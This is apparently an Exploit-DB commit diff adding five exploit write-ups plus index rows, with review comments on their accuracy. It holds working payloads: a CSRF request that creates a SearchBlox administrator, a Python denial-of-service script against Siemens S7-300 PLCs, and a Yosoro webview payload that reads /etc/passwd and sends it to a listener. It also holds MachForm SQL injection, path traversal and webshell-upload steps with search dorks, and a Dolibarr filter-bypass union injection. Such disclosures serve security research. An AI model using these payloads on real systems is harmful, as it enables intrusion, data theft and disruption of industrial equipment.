DB: 2018-05-31

6 changes to exploits/shellcodes

Siemens SIMATIC S7-300 CPU - Remote Denial of Service

Procps-ng - Multiple Vulnerabilities
SearchBlox 8.6.6 - Cross-Site Request Forgery
Yosoro 1.0.4 - Remote Code Execution
MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass
Dolibarr 7.0.0 - SQL Injection
Offensive Security 2018-05-31 05:01:44 +00:00
parent 96e4f1686b
commit 89ee92def8
7 changed files with 2579 additions and 0 deletions


@ -0,0 +1,48 @@
# Exploit Title: CSRF Privilege Escalation (Creation of an administrator
account) on SearchBlox 8.6.6
# Exploit Author: Canberk BOLAT, Ahmet GÜREL
# Software Link: https://www.searchblox.com/
# Version: < = SearchBlox Version 8.6.6
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-11538
# 1. DETAILS
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who
is currently authenticated with a web application to execute an unwanted
action. The attacker can trick the user into loading a page which may send
a request to perform the unwanted action in the background. In the case of
Searchblox, we can use CSRF to perform actions on the admin dashboard by
targeting an administrator.
# 2. PoC:
We assume that Searchblox is installed at http://localhost:8080/. Our
target is /searchblox/servlet/UserServlet u_name, u_passwd1, u_passwd2 and
role parameter which is the page used to create a new user. The given POC
will create a user on the website which has full administrator privileges.
HTTP Request:
GET
/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser
HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/searchblox/admin/main.jsp?menu1=adm
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cookie: JSESSIONID=touluja8tpjc1iiwquoyiigfi;
Connection: close
Upgrade-Insecure-Requests: 1
Attack Vector:
<img src="
http://target:8080/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser"
width="0" height="0">
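Review bot: the `# Version:` line reads "< = SearchBlox Version 8.6.6", which leaves it unclear whether 8.6.6 itself is affected while the title says it is; write it as "<= 8.6.6" and add the `# Date:` and `# Vendor Homepage:` lines the other new files in this commit carry. The captured request also shows `Content-Type: application/x-www-form-urlencoded` and `Content-Length: 0` on a GET, plus a same-origin `Referer`; the `<img>` vector sends none of those, so state that the request was confirmed to succeed without them (i.e. that UserServlet accepts the user creation over a plain GET with no anti-CSRF token or Referer check), otherwise a reader cannot tell from the write-up whether the browser-delivered variant works.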

exploits/linux/dos/44802.py Executable file

@ -0,0 +1,21 @@
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-30
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-300 CPU family: all versions.
# Tested on: Kali Linux
# CVE: CVE-2015-2177
#!/usr/bin/python
import socket
target_address="TargetIP"
target_port=80
buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
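Review bot: the `#!/usr/bin/python` line is the ninth line of the file, after the header comments, so it is not a shebang and the executable bit on the file does nothing; move it to line 1. `sock.send(buffer)` passes a `str`, which only works on Python 2 (Python 3 raises `TypeError: a bytes-like object is required`); use `sock.send(buffer.encode())` or a `b"..."` literal. `target_address="TargetIP"` is a placeholder with no `sys.argv` handling, and `connect=sock.connect(...)` stores a `None` that is never used. Finally, `# Version: SIMATIC S7-300 CPU family: all versions.` is a broader claim than the referenced CVE-2015-2177 supports; state the firmware that was actually tested (the header only says "Tested on: Kali Linux", which is the attacker host, not the target).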

File diff suppressed because it is too large.


@ -0,0 +1,17 @@
# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
# _ _ _ _ _ ___ _ _
# | || | __ _ __ | |__| |_ (_)__ __ ___ / __| ___ __ _ _ _ _ (_)| |_ _ _
# | __ |/ _` |/ _|| / /| _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| || _|| || |
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_| |_| \__| \_, |
# Remote Code Execution (CVE-2018-11522)
# Payload:
<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>
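Review bot: the title and the `# Remote Code Execution (CVE-2018-11522)` banner promise code execution, but the payload only reads `/etc/passwd` through `require('fs')` and exfiltrates it to `http://127.0.0.1:8089/`; as written it demonstrates an arbitrary file read via a `nodeintegration` `<webview>`, so either demonstrate command execution or retitle accordingly. The write-up also never says where the HTML is injected (a note body, an imported file, a rendered Markdown field), so the PoC is not reproducible from this file; add that delivery step and note that the listener on port 8089 is the attacker's.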


@ -0,0 +1,105 @@
Vendor: Appnitro
Product webpage: https://www.machform.com/
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
Fix: https://www.machform.com/blog-machform-423-security-release/
Author: Amine Taouirsa
Twitter: @metalamin
Google dork examples:
----------------------
"machform" inurl:"view.php"
"machform" inurl:"embed.php"
Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.
The application is widely deployed and with some google dorks its possible
to find various webpages storing sensitive data as credit card numbers with
corresponding security codes. Also, the arbitrary file upload can let an
attacker get control of the server by uploading a WebShell.
[1] SQL injection (CVE-2018-6410):
-------------------------
[1.1] Description:
The software is subject to SQL injections in the download.php file.
[1.2] Parameters and statement:
This SQLi can be found on the parameter q which a base64 encoded value
for the following parameters:
$form_id = $params['form_id'];
$id = $params['id'];
$field_name = $params['el'];
$file_hash = $params['hash'];
So the injectable parameters are el and form_id obtaining error-based,
stacked queries and time-based blind SQL injections. This is due to the
following vulnerable statement:
$query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
where id=?";
[1.3] POC
Proof of concept to get the first user mail:
http:// [URL] / [Machform_folder] /download.php?q=
ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy
MDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz
ZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io
UkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF
Ul9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
Which is the base64 encoding for:
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a) ;&id=1&hash=1&form_id=1
[2] Path traversal (CVE-2018-6409):
-----------------------------------
[2.1] Descrition
download.php is used to serve stored files from the forms answers.
Modifying the name of the file to serve on the corresponding ap_form table
leads to a path traversal vulnerability.
[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set element_4="../../../../../../.
./../../../../../../../../../etc/passwd" where id=1;
Now in order to be able to download it, we need to access:
http:// [URL] / [Machform_folder] /download.php?q=
ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0
NTgmZm9ybV9pZD01ODAwOQo=
Which is the base64 encoding for;
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009
Note that hash is the MD5 of the corresponding filename:
md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458
[3] Bypass file upload filter (CVE-2018-6411):
----------------------------------------------
When the form is set to filter a blacklist, it automatically add dangerous
extensions to the filters.
If the filter is set to a whitelist, the dangerous extensions can be
bypassed.
This can be done directly on the database via SQLi
update ap_form_elements set element_file_type_list="php",
element_file_block_or_allow="a" where form_id=58009 and element_id=4;
Once uploaded the file can be found and executed in the following URL:
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]
The filename can be found in the database
SELECT element_4 FROM ap_form_58009 WHERE id=1;
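Review bot: section [2.2] shows an `update ap_form_58009 set element_4=...` statement without saying how a remote attacker executes it; since [1.2] says the injection supports stacked queries and [3] says its database change is done "via SQLi", say the same here so the path traversal is tied to the injection rather than to assumed database access. The traversal string in that `update` is also broken across two lines ("../../../../../../." / "./../../..."), which will not paste back as the path whose md5 (402ba0230d6f44a2de590ac11107a458) is given just below; keep it on one line. Typos: "Descrition" (Description), "Full-Disclose" (Full disclosure), "it automatically add" (adds). The header also lacks the `# Exploit Title` / `# Date` / `# Version` lines used by the other new files, so the affected range (< 4.2.3) appears only in files.csv and the fix link.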


@ -0,0 +1,204 @@
# [CVE-2018-10094] Dolibarr SQL Injection vulnerability
## Description
Dolibarr is an "Open Source ERP & CRM for Business" used by many
companies worldwide.
It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
or as distribution packages (e.g .deb package).
**Threat**
The application does not handle user input properly and allows execution
of arbitrary SQL commands on the database.
**Expectation**
Prepared queries should be used in order to avoid SQL injection in user
input.
## Vulnerability type
**CVE ID**: CVE-2018-10094
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 7.5
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
## Details
The database connector escapes quotes with the `real_escape_string()`
wrapper. However it is still possible to perform injection on integer
parameters without quotes.
```php
mysqli.class.php
/**
* Escape a string to insert data
*
* @param string $stringtoencode String to escape
* @return string String escaped
*/
function escape($stringtoencode)
{
return $this->db->real_escape_string($stringtoencode);
}
```
Additional checks are defined later, which forbit some SQL keywords (e.g
`union`, `create`, `insert`). However, by url encoding the payload,
these checks are bypassed.
```php
main.inc.php
/**
* Security: SQL Injection and XSS Injection (scripts) protection
(Filters on GET, POST, PHP_SELF).
*
* @param string $val Value
* @param string $type 1=GET, 0=POST, 2=PHP_SELF
* @return int >0 if there is an injection
*/
function test_sql_and_script_inject($val, $type)
{
$inj = 0;
// For SQL Injection (only GET are used to be included into bad
escaped SQL requests)
if ($type == 1)
{
$inj += preg_match('/updatexml\(/i', $val);
$inj += preg_match('/delete\s+from/i', $val);
$inj += preg_match('/create\s+table/i', $val);
$inj += preg_match('/insert\s+into/i', $val);
$inj += preg_match('/select\s+from/i', $val);
$inj += preg_match('/into\s+(outfile|dumpfile)/i', $val);
}
if ($type != 2) // Not common, we can check on POST
{
$inj += preg_match('/update.+set.+=/i', $val);
$inj += preg_match('/union.+select/i', $val);
$inj += preg_match('/(\.\.%2f)+/i', $val);
}
// For XSS Injection done by adding javascript with script
// This is all cases a browser consider text is javascript:
// When it found '<script', 'javascript:', '<style', 'onload\s=' on
body tag, '="&' on a tag size with old browsers
// All examples on page: http://ha.ckers.org/xss.html#XSScalc
// More on
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
$inj += preg_match('/<script/i', $val);
$inj += preg_match('/<iframe/i', $val);
$inj += preg_match('/Set\.constructor/i', $val); // ECMA script 6
if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
$inj += preg_match('/base[\s]+href/si', $val);
$inj += preg_match('/<.*onmouse/si', $val); // onmousexxx can
be set on img or any html tag like <img title='...' onmouseover=alert(1)>
$inj += preg_match('/onerror\s*=/i', $val); // onerror can be
set on img or any html tag like <img title='...' onerror = alert(1)>
$inj += preg_match('/onfocus\s*=/i', $val); // onfocus can be
set on input text html tag like <input type='text' value='...' onfocus =
alert(1)>
$inj += preg_match('/onload\s*=/i', $val); // onload can be
set on svg tag <svg/onload=alert(1)> or other tag like body <body
onload=alert(1)>
$inj += preg_match('/onclick\s*=/i', $val); // onclick can be
set on img text html tag like <img onclick = alert(1)>
$inj += preg_match('/onscroll\s*=/i', $val); // onscroll can be
on textarea
//$inj += preg_match('/on[A-Z][a-z]+\*=/', $val); // To lock event
handlers onAbort(), ...
$inj += preg_match('/&#58;|&#0000058|&#x3A/i', $val); //
refused string ':' encoded (no reason to have it encoded) to lock
'javascript:...'
//if ($type == 1)
//{
$inj += preg_match('/javascript:/i', $val);
$inj += preg_match('/vbscript:/i', $val);
//}
// For XSS Injection done by adding javascript closing html tags
like with onmousemove, etc... (closing a src or href tag with not
cleaned param)
if ($type == 1) $inj += preg_match('/"/i', $val); // We
refused " in GET parameters value
if ($type == 2) $inj += preg_match('/[;"]/', $val); // PHP_SELF
is a file system path. It can contains spaces.
return $inj;
}
```
## Proof of Concept : retrieving the database name.
Payload:
```
1) union select
0,1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
Url-encoded payload:
%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
```
```http
GET
/dolibarr/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
HTTP/1.1
Host: dolibarr.lab:2080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie:
DOLSESSID_cac4a1e49e4040e845340fe919bd202b=qh3ot46kvm95ph0ddd3ujd7je5
Connection: close
Upgrade-Insecure-Requests: 1
...
</a>
</td>
<td>10.1.26-MariaDB-0+deb9u1</td>
<td>2</td>
<td></td>
<td>1</td>
<td>21</td>
<td class="nowrap">
```
## Affected versions
* Version 7.0.0 (last stable version as of March 2018) - previous
versions are probably also vulnerable but not tested
## Solution
Update to 7.0.2
([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))
## Timeline (dd/mm/yyyy)
* 18/03/2018 : Initial discovery
* 17/04/2018 : Contact with the editor
* 17/04/2018 : Editor acknowledges the vulnerability
* 18/04/2018 : Editor announces fixes in version 7.0.2
* 21/05/2018 : Vulnerability disclosure
## Credits
* Issam RABHI (i dot rabhi at sysdream dot com)
* Kevin LOCATI (k dot locati at sysdream dot com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
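Review bot: the heading "Proof of Concept : retrieving the database name" does not match the payload, which selects `version()` and returns `10.1.26-MariaDB-0+deb9u1`, a server version string; either change the heading to "retrieving the database version" or select `database()`. The CVSS vector claims `PR:N`, but the PoC request carries a `DOLSESSID_...` session cookie against `/dolibarr/adherents/list.php`; if the injection is reachable without a session, say so, otherwise the vector should be `PR:L` and the 7.5 score revisited. Typo: "forbit" (forbid). The Details section also speaks only of "integer parameters" in general; naming `statut` there as the injected parameter would make the request easier to follow.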


@ -5983,6 +5983,7 @@ id,file,description,date,author,type,platform,port
44758,exploits/windows/dos/44758.html,"Microsoft Edge Chakra - Cross Context Use-After-Free",2018-05-25,"Google Security Research",dos,windows,
44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
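Review bot: 44802 is filed with platform `linux`, but the target is a Siemens S7-300 CPU; the other entries in this hunk use the platform of the target (windows for Edge, php for Symfony, multiple for Skia/Firefox), not of the attacker script, so `hardware` would be the consistent value for a PLC, with the file moved under exploits/hardware/dos/ to match.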
@ -9748,6 +9749,7 @@ id,file,description,date,author,type,platform,port
44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
44806,exploits/linux/local/44806.txt,"Procps-ng - Multiple Vulnerabilities",2018-05-30,"Qualys Corporation",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39470,3 +39472,7 @@ id,file,description,date,author,type,platform,port
44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
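Review bot: the port column is inconsistent inside this hunk: 44804 and 44805 carry `80` while 44801 and 44803, also webapps entries, and the three preceding entries leave it empty; pick one convention. The author for 44801 is recorded as "Ahmet Gurel", whereas the file header credits "Canberk BOLAT, Ahmet GÜREL"; reconcile the credit.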
